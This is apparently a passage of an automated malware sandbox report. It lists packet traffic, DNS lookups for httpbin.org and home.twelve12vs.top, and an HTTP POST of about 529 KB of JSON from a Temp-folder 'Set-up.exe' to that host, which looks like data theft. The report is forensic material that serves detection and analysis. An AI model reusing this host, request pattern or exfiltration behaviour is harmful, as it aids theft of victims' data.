                                            Jan 12, 2025 17:45:22.631129980 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.631162882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631189108 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.631191015 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631220102 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631253004 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631304026 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631364107 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631392956 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631419897 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631448030 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631474972 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631500959 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631547928 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631576061 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631603956 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631629944 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631658077 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631685019 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631711960 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631740093 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631767035 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631793976 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631819963 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631871939 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631901026 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631927967 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631961107 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.631988049 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632015944 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632042885 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632071018 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632098913 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632126093 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632167101 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632193089 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632220030 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632247925 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632299900 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632328987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632354021 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632395029 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632421017 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632447958 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632474899 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.632502079 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637397051 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637425900 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637476921 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637522936 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637578011 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637619972 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637646914 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637700081 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637728930 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637754917 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.637757063 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637808084 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637813091 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.637835979 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637861967 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637912035 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637942076 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.637969017 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638019085 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638046980 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638075113 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638101101 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638151884 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638180017 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638207912 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638233900 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638287067 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638314962 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638343096 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638370037 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638396978 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638428926 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638470888 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638478994 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638506889 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638533115 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638611078 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638653994 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638680935 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638708115 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638736010 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638765097 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638792038 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638832092 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638859034 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638885975 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638936043 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638964891 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.638992071 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639019966 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639048100 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639074087 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639101982 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639137030 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.639142990 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644015074 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644068003 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644119978 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644148111 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644196033 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644222975 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644285917 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644315958 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644366026 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644395113 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644447088 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644474983 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644526005 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644552946 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644583941 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644610882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644710064 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644740105 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644783020 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644810915 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644860983 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644890070 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644917011 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644943953 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.644994020 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645023108 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645050049 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645077944 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645127058 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645154953 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645181894 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645210028 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645236969 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645279884 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645330906 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645359039 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645386934 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645412922 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645440102 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645467043 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645493984 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645520926 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645570040 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645597935 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645626068 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645652056 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645679951 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645724058 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645750999 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645777941 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645804882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645832062 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.645864964 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.651823044 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.651905060 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.656713963 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656774998 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656804085 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656852961 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656881094 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656950951 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656980038 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.656981945 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.657030106 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657035112 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.657073975 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657102108 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657130003 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657180071 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657208920 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657236099 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657264948 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657291889 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657319069 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657368898 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657396078 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657426119 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657433987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657461882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657490015 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657516956 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657543898 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657594919 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657624006 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657650948 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657677889 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657706022 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657733917 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657783985 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657812119 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657839060 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657866001 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657896042 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657922029 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657949924 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.657977104 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658004045 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658030987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658096075 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658123970 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658152103 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658179045 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658206940 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658248901 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658276081 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658303022 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658350945 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658384085 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658391953 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.658400059 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663249016 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663305998 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663353920 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663418055 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663445950 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663460970 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:22.663496971 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663525105 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663573027 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663602114 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663650036 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663686037 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663712978 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663739920 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663788080 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663815975 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663842916 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663870096 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663898945 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663924932 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.663975954 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664004087 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664031982 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664058924 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664086103 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664113998 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664163113 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664191008 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664216995 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664264917 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664280891 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664293051 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664307117 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664335966 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664350033 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664364100 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664376020 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664387941 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664401054 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664413929 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664428949 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664467096 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664494038 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664520979 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664561987 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664589882 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664639950 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664666891 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664696932 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664724112 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664751053 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664777994 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664804935 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.664855003 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.670063019 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.670114994 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.670130968 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.670161009 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:22.713886976 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:25.949558020 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:25.949806929 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:25.954814911 CET8049723176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:25.954876900 CET4972380192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:26.277345896 CET4974480192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:26.282224894 CET8049744176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:26.282320023 CET4974480192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:26.282490015 CET4974480192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:26.287349939 CET8049744176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:27.083122015 CET8049744176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:27.086627960 CET4974480192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:27.091625929 CET8049744176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:27.094289064 CET4974480192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:28.060548067 CET4976180192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:28.065346003 CET8049761176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:28.065453053 CET4976180192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:28.065629959 CET4976180192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:28.070429087 CET8049761176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:28.951916933 CET8049761176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:28.952258110 CET4976180192.168.2.5176.53.147.104
                                            Jan 12, 2025 17:45:28.957225084 CET8049761176.53.147.104192.168.2.5
                                            Jan 12, 2025 17:45:28.957285881 CET4976180192.168.2.5176.53.147.104

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 12, 2025 17:45:18.875922918 CET5843353192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:18.876012087 CET5843353192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:18.883191109 CET53584331.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:18.883223057 CET53584331.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:21.204427958 CET5843653192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:21.204478979 CET5843653192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:21.695023060 CET53584361.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:21.925106049 CET53584361.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:25.964458942 CET5445753192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:25.964495897 CET5445753192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:26.276151896 CET53544571.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:26.276388884 CET53544571.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:27.093185902 CET5445953192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:27.093252897 CET5445953192.168.2.51.1.1.1
                                            Jan 12, 2025 17:45:27.930988073 CET53544591.1.1.1192.168.2.5
                                            Jan 12, 2025 17:45:28.059586048 CET53544591.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 12, 2025 17:45:18.875922918 CET192.168.2.51.1.1.10x6c4aStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:18.876012087 CET192.168.2.51.1.1.10x19eaStandard query (0)httpbin.org28IN (0x0001)false
                                            Jan 12, 2025 17:45:21.204427958 CET192.168.2.51.1.1.10x3494Standard query (0)home.twelve12vs.topA (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:21.204478979 CET192.168.2.51.1.1.10x45ebStandard query (0)home.twelve12vs.top28IN (0x0001)false
                                            Jan 12, 2025 17:45:25.964458942 CET192.168.2.51.1.1.10x155cStandard query (0)home.twelve12vs.topA (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:25.964495897 CET192.168.2.51.1.1.10x16d9Standard query (0)home.twelve12vs.top28IN (0x0001)false
                                            Jan 12, 2025 17:45:27.093185902 CET192.168.2.51.1.1.10x8852Standard query (0)home.twelve12vs.topA (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:27.093252897 CET192.168.2.51.1.1.10x57adStandard query (0)home.twelve12vs.top28IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 12, 2025 17:45:16.087816000 CET1.1.1.1192.168.2.50x5786No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:16.087816000 CET1.1.1.1192.168.2.50x5786No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:18.883223057 CET1.1.1.1192.168.2.50x6c4aNo error (0)httpbin.org3.210.94.60A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:18.883223057 CET1.1.1.1192.168.2.50x6c4aNo error (0)httpbin.org50.19.58.113A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:21.925106049 CET1.1.1.1192.168.2.50x3494No error (0)home.twelve12vs.top176.53.147.104A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:26.276388884 CET1.1.1.1192.168.2.50x155cNo error (0)home.twelve12vs.top176.53.147.104A (IP address)IN (0x0001)false
                                            Jan 12, 2025 17:45:28.059586048 CET1.1.1.1192.168.2.50x8852No error (0)home.twelve12vs.top176.53.147.104A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • httpbin.org
                                            • home.twelve12vs.top

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549723176.53.147.104803128C:\Users\user\AppData\Local\Temp\Set-up.exe
                                            TimestampBytes transferredDirectionData
                                            Jan 12, 2025 17:45:21.936119080 CET12360OUTPOST /AvWHJxAVCxPehbRictmJ1736163220 HTTP/1.1
                                            Host: home.twelve12vs.top
                                            Accept: */*
                                            Content-Type: application/json
                                            Content-Length: 529138
